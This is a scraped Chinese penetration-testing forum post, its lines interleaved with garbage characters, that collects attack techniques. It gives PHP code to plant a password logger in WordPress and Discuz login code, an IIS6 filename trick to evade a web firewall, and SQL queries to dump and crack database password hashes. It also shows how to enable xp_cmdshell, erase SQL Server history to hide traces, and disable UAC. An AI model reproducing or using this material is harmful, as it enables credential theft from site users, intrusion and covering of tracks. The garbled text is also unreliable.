$ Q+ w2 W8 M- `+ O0 b5 P$log_ip=$_SERVER["REMOTE_ADDR"];" \+ w( D% R9 |+ X% s0 T
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
; D0 X$ F7 E( ^$ c( y# ?) [$ o% L  J7 f$txt=$txt.”\r\n”;; U% s% M8 }$ |/ h4 N9 E
if($log_user&&$log_pwd&&$log_ip){
' T4 V: M- F* w0 {/ @; v@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
: @% b& A( G1 F' P% ^}
+ {! Q/ D$ k! b. w6 B8 ^当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。7 V( H' V( I4 n# G) d2 U" L2 A
就是搜索case ‘login’8 P* D/ N# M7 e9 s$ r
在它下面直接插入即可,记录的密码生成在pwd.txt中,; \( |+ @  b% w  ]4 x  {4 N
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
$ O# K* _% B7 I9 V利用II6文件解析漏洞绕过安全狗代码:
# @$ f! ]) S; z8 m( G2 k;antian365.asp;antian365.jpg6 Q6 ]: @* S: i( {7 f" E" j9 }7 B3 M& S

% h8 A6 E2 F* A* i  j各种类型数据库抓HASH破解最高权限密码!
+ _! ~' C' y; e& u8 k0 M2 K1.sql server2000
4 w: F6 t: A$ K- @. ]SELECT password from master.dbo.sysxlogins where name='sa'% I2 X5 u" ~7 X2 k7 J; }
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341, d/ c$ r! b$ q8 ^# V& f  Q; A. H
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
, ^& v5 L% s. {
( ?" M5 ^- i) D3 J. f4 O0×0100- constant header
. c& ~* n9 V$ d34767D5C- salt1 W$ f) M4 a$ d. N* ?  A9 g
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash$ l  ]& N/ z$ P8 t  }) q* _  j) l
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash- x! ]" `# J) K
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash! q: p& G; w/ H# T; ?) ~1 M
SQL server 2005:-
# q8 R, H3 M1 g% S+ a; ?% |SELECT password_hash FROM sys.sql_logins where name='sa'+ ?1 b2 W3 ^8 M$ Q$ W) q
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
  l" p1 f1 k0 [+ s' J4 `: G! J0×0100- constant header; P+ s% r9 t4 O+ Y
993BF231-salt+ o5 w& i5 Q( l0 z% D1 P3 H
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
$ a) G: c' [5 Y3 I* ?crack case sensitive hash in cain, try brute force and dictionary based attacks.
! E( H  k1 H, Z1 v# o3 J5 O5 M6 r7 f# d/ s
update:- following bernardo’s comments:-6 G! Z- r+ K4 B% S$ Q. ?( N
use function fn_varbintohexstr() to cast password in a hex string.
. X( B7 t6 k% @9 v" I. u, Z$ }; k- I& ue.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
* l, ^% J" j# R! \
- g& |) L- ~9 Y4 eMYSQL:-4 M8 l, A( e) z" s) \! i8 w3 a" d1 |) |" ~
) f$ y6 |* m, |7 }
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
0 `4 [* Z! Z4 j) z) {  J  O" I- c3 O
( t6 w/ e+ Z# C; L4 \1 S1 a*mysql  < 4.1
& \& ]  d- \; P  }! B
' `: ^: v* j& y$ {9 i) H5 S$ Nmysql> SELECT PASSWORD(‘mypass’);
: i1 n) r1 \3 n0 V* w5 s  ^+——————–+) G1 E, n* l3 K
| PASSWORD(‘mypass’) |
3 r. ?1 u" s! N* W! K+——————–+
4 Q4 Z6 ~7 ?, s2 W8 ~6 P| 6f8c114b58f2ce9e   |
0 c3 Z7 A- E* Q$ ~8 r" \+——————–+
, q1 F, k* a, \) t1 B8 W) a* C! T  W2 Y$ Q
*mysql >=4.1
( t# _- n+ S3 @- e5 V: W/ u7 p. H  I4 H
mysql> SELECT PASSWORD(‘mypass’);
2 n9 l+ D+ I+ R2 Z. x! K% F+——————————————-+
6 S2 ]; N0 t" u: @) `; ^) w| PASSWORD(‘mypass’)                        |2 N& V9 a: D7 T% {0 J# Z
+——————————————-++ S& g# [% N+ ?2 `- i  \% A
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
0 C$ q. g/ S# z% E6 U1 o+——————————————-+1 w! ?9 }6 }- m. x' R' e- b; u% c. B
* h9 A- M, z. a& T* T2 {1 Y* v
Select user, password from mysql.user
8 u# m( v, p, u) B9 }The hashes can be cracked in ‘cain and abel’: S( t) d4 g; V
  y, Y/ }3 X& ^4 M  I! ~
Postgres:-: y6 ~, _, P! B; z+ x" S
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)7 \1 J. R, \+ G) ~" G& g
select usename, passwd from pg_shadow;6 H. E6 {( Q; Q8 [, G6 w7 z6 ^7 P3 T
usename      |  passwd
* d: e; b# Y; Q: l——————+————————————-
3 ^. |- O5 K; K9 Ktestuser            | md5fabb6d7172aadfda4753bf0507ed4396
3 `0 Q0 V8 `6 ~" c- _+ E3 Uuse mdcrack to crack these hashes:-
8 @6 @3 C" E3 J$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396- P, @# I# p! R  v1 T
6 i2 A# [+ r& i+ |% _. K
Oracle:-7 t2 R0 u! o  i- o1 j& V# M
select name, password, spare4 from sys.user$
( N7 q, i/ ~( n$ o2 qhashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
: ?) `+ L! b0 x9 F2 C. g0 kMore on Oracle later, i am a bit bored….
" c9 p' b2 q1 F1 l3 `/ F, o7 ^
& Q3 ?( N5 ~2 q$ j
5 q5 u( T, n( }在sql server2005/2008中开启xp_cmdshell$ E2 r  \0 U/ u
-- To allow advanced options to be changed.
3 V7 p! t6 F+ b# B% X- uEXEC sp_configure 'show advanced options', 14 ~* W: Q1 q7 Q" {/ h6 Q4 |1 {
GO( A  Z0 d8 m: M- K) \
-- To update the currently configured value for advanced options.- m9 g- L5 _! e7 G  z' a/ X0 i" D
RECONFIGURE; e+ e" ]5 ?4 _6 [
GO
% S' i+ o5 Z% R0 s! E2 J: f; U. B-- To enable the feature.
5 m0 C7 q- o/ r1 D; `* O2 ]EXEC sp_configure 'xp_cmdshell', 16 E( k  `: O* a( g6 s: b
GO- v% O  `$ {3 M9 J% i
-- To update the currently configured value for this feature.4 {! b+ d$ R* E8 H; w- P: a5 |: ~
RECONFIGURE
# Z4 N5 k. P" R5 b, q' \# I; bGO3 t+ f3 C4 d2 s0 e$ [) v
SQL 2008 server日志清除,在清楚前一定要备份。6 q  L& q4 d$ L8 G
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:! _2 p8 v; i$ _2 W9 ?) q
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin9 |) ~5 Q. {% l

9 K' B* t6 f. j2 G1 ^/ s4 p7 G1 u1 P$ Z对于SQL Server 2008以前的版本:
$ t# ?. V5 j$ E  G" wSQL Server 2005:( }+ I3 q# _! B7 N3 n
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat+ t: q6 _% X5 J/ M
SQL Server 2000:
3 y7 `+ h0 d# N+ ^2 w清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。
) k, V( @$ [2 u2 }9 j& n* V
0 b, n3 x; f, l6 I2 z: N! Z本帖最后由 simeon 于 2013-1-3 09:51 编辑1 ~6 g4 L* K4 B3 r* R/ P8 G3 M
3 }) P8 o1 W$ G

- o/ d$ t# ?7 @* m& Ywindows 2008 文件权限修改
5 f  G* d' Z2 l8 j4 y; k1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx% U& e' e8 M, L9 R$ L' f( K4 S7 ?
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad981 h* s8 B/ h5 y$ x2 p( y' x
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,9 l- U( P3 P5 M# x6 y8 B% Q+ e; Y

0 U8 n" l+ l8 _& G  iWindows Registry Editor Version 5.004 ~5 D  |9 u  B4 F
[HKEY_CLASSES_ROOT\*\shell\runas]
5 d* T# d+ y& m* {% X5 N@="管理员取得所有权"
3 J3 t  C1 T4 w7 k"NoWorkingDirectory"=""6 e: V9 ]+ A& d  ^( K0 S6 i
[HKEY_CLASSES_ROOT\*\shell\runas\command]
' ~; Y( J& P' n# v0 a@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
, V$ @: z. F2 K% y' g4 v"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
3 t0 j# s* o4 I: `! M[HKEY_CLASSES_ROOT\exefile\shell\runas2]
! s4 [/ W5 f$ ~/ y; l/ w@="管理员取得所有权"1 s) A/ t2 D- I; \/ y7 v
"NoWorkingDirectory"=""
0 V  N0 j- v# \$ o! q[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]/ G; d+ d" z0 h5 R( r2 S
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"! `- T# N1 Q8 l3 j: }, q
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"* c, B6 ?+ R  W+ f

7 L! _. E) J- c9 J! _1 t[HKEY_CLASSES_ROOT\Directory\shell\runas]
6 j& u8 z8 N0 N3 J@="管理员取得所有权"
5 Q, P, \+ e; r1 O: ~"NoWorkingDirectory"="", P5 ]5 V& g& [2 U/ a0 X
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]0 `$ d4 `1 f) o/ n
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t", @: c8 o% q& Q+ y
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
8 r  d! Y7 v7 I& {9 W
+ Q8 S2 Z0 t% P- k! l( F- k9 _4 u4 l2 L5 u
win7右键“管理员取得所有权”.reg导入& i$ t6 ?3 E! \3 h' s9 W% _" S
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
$ ^$ M7 b# ^1 v; z5 J; A: j  ~1、C:\Windows这个路径的“notepad.exe”不需要替换- h( _$ G) ?9 d7 C3 N7 Z
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换& r; Y5 n) L$ u$ R% c
3、四个“notepad.exe.mui”不要管
! Y* Y4 A0 g1 c3 z4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和$ [( i3 S1 |) k/ r
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”! v$ n  ^$ e; a- o+ ]4 j' R$ J
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,) O" _* `' Y/ j3 H
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。& v' h; s+ c; \! F5 C8 O
windows 2008中关闭安全策略: 9 `9 D- _( x2 y0 [2 ?4 _/ P% H) Y
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f; P( @# f# R; T8 B! s
修改uc_client目录下的client.php 在
% d, A/ O8 E8 \# Zfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
  m3 ~/ m* z9 ?  w0 b6 E% W下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
' @4 j' {% B; ^% v你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
; }5 M, ~0 R9 [2 b. pif(getenv('HTTP_CLIENT_IP')) {
2 Y8 X7 K/ f9 F) A: w: ?2 J$onlineip = getenv('HTTP_CLIENT_IP');
# [1 e: s% m/ N  x! L; t5 b4 H$ m} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
( g" L5 m$ R6 M0 ~! q( m$onlineip = getenv('HTTP_X_FORWARDED_FOR');9 w8 F' Q% s" R0 Q' x. a% ^9 y4 [
} elseif(getenv('REMOTE_ADDR')) {. }2 d; a3 G; g% d4 v
$onlineip = getenv('REMOTE_ADDR');0 I" z6 r* k  z. t' _
} else {! O0 W& @1 G& R0 b
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
8 p2 ~1 ]" d0 A4 D5 d}' z% \! j; n& W/ x2 M3 P2 {' L) }
     $showtime=date("Y-m-d H:i:s");
# D+ U2 Y0 y8 r. {/ b+ a- z5 O    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
3 v, v  C) j, u# {    $handle=fopen('./data/cache/csslog.php','a+');9 L' _  d/ s4 a5 V: E3 T
    $write=fwrite($handle,$record);




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2